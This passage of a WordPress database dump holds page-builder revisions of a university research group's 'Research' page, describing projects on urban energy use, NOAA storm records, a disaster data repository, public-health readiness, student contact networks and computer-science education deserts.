v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">ORPHEUS</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:45:09','2023-09-29 14:45:09','',126,'https://gsudice.dataconn.net/?p=1524',0,'revision','',0),(1530,1,'2023-09-29 11:12:14','2023-09-29 15:12:14','','map1','','inherit','open','closed','','map1','','','2023-09-29 11:12:14','2023-09-29 15:12:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/map1.jpg',0,'attachment','image/jpeg',0),(1531,1,'2023-09-29 11:12:20','2023-09-29 15:12:20','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-map1.jpg','cropped-map1.jpg','','inherit','open','closed','','cropped-map1-jpg','','','2023-09-29 11:12:20','2023-09-29 15:12:20','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-map1.jpg',0,'attachment','image/jpeg',0),(1532,1,'2023-09-29 11:13:13','2023-09-29 15:13:13','','map1','','inherit','open','closed','','map1-2','','','2023-09-29 11:13:13','2023-09-29 15:13:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/map1-1.jpg',0,'attachment','image/jpeg',0),(1533,1,'2023-09-29 11:13:43','2023-09-29 15:13:43','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-map1-1.jpg','map1','','inherit','open','closed','','map1-3','','','2023-09-29 11:13:43','2023-09-29 15:13:43','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-map1-1.jpg',0,'attachment','image/jpeg',0),(1534,1,'2023-09-29 11:14:23','2023-09-29 15:14:23','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c40\",\"parentId\":\"126-c39\",\"partialId\":126,\"styleRef\":868,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}}}}},\"id\":\"126-c41\",\"parentId\":\"126-c39\",\"partialId\":126,\"children\":[{\"name\":\"hop-text\",\"parentId\":\"126-c41\",\"index\":2,\"id\":\"126-c44\",\"partialId\":126,\"styleRef\":872,\"type\":\"content\",\"props\":{\"content\":\"<p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes, and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. <\\/p>\"}}],\"styleRef\":869,\"type\":\"content\"}],\"id\":\"126-c39\",\"parentId\":\"126-c38\",\"partialId\":126,\"styleRef\":867,\"type\":\"content\"}],\"id\":\"126-c38\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":866,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 11:14:23','2023-09-29 15:14:23','',438,'https://gsudice.dataconn.net/?p=1534',0,'revision','',0),(1535,1,'2023-09-29 11:14:23','2023-09-29 15:14:23','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 